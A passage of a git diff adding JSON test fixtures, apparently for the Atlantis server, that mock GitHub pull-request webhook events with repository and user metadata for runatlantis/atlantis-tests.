"https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", 
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + 
"comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + 
"open_issues_count": 1, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 1, + "watchers": 0, + "default_branch": "master" + } + }, + "_links": { + "self": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1" + }, + "html": { + "href": "https://github.com/runatlantis/atlantis-tests/pull/1" + }, + "issue": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1" + }, + "comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments" + }, + "review_comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments" + }, + "review_comment": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}" + }, + "commits": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits" + }, + "statuses": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e" + } + }, + "author_association": "OWNER", + "merged": false, + "mergeable": true, + "rebaseable": true, + "mergeable_state": "clean", + "merged_by": null, + "comments": 62, + "review_comments": 0, + "maintainer_can_modify": false, + "commits": 3, + "additions": 198, + "deletions": 8, + "changed_files": 24 + }, + "repository": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": 
"https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 1, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 1, + "watchers": 0, + "default_branch": "master" + }, + "sender": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": 
"https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + } +} \ No newline at end of file diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json new file mode 100644 index 0000000000..0b969438ec --- /dev/null +++ b/server/testfixtures/githubPullRequestOpenedEvent.json @@ -0,0 +1,468 @@ +{ + "action": "opened", + "number": 2, + "pull_request": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2", + "id": 194034250, + "node_id": "MDExOlB1bGxSZXF1ZXN0MTk0MDM0MjUw", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2", + "number": 2, + "state": "open", + "locked": false, + "title": "Noyaml", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": 
"https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "body": "", + "created_at": "2018-06-11T16:22:16Z", + "updated_at": "2018-06-11T16:22:16Z", + "closed_at": null, + "merged_at": null, + "merge_commit_sha": null, + "assignee": null, + "assignees": [ + + ], + "requested_reviewers": [ + + ], + "requested_teams": [ + + ], + "labels": [ + + ], + "milestone": null, + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits", + "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments", + "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d", + "head": { + "label": "runatlantis:noyaml", + "ref": "noyaml", + "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": 
"https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:09Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 7, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + } + }, + "base": { + "label": "runatlantis:master", + "ref": "master", + "sha": "f59a822e83b3cd193142c7624ea635a5d7894388", + "user": { + "login": "runatlantis", + "id": 1034429, + 
"node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": 
"https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:09Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": 
"git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 7, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + } + }, + "_links": { + "self": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2" + }, + "html": { + "href": "https://github.com/runatlantis/atlantis-tests/pull/2" + }, + "issue": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2" + }, + "comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments" + }, + "review_comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments" + }, + "review_comment": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}" + }, + "commits": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits" + }, + "statuses": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d" + } + }, + "author_association": "OWNER", + "merged": false, + "mergeable": null, + "rebaseable": null, + "mergeable_state": "unknown", + "merged_by": null, + "comments": 0, + "review_comments": 0, + "maintainer_can_modify": false, + "commits": 5, + "additions": 181, + "deletions": 8, + "changed_files": 23 + }, + "repository": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": 
"runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": 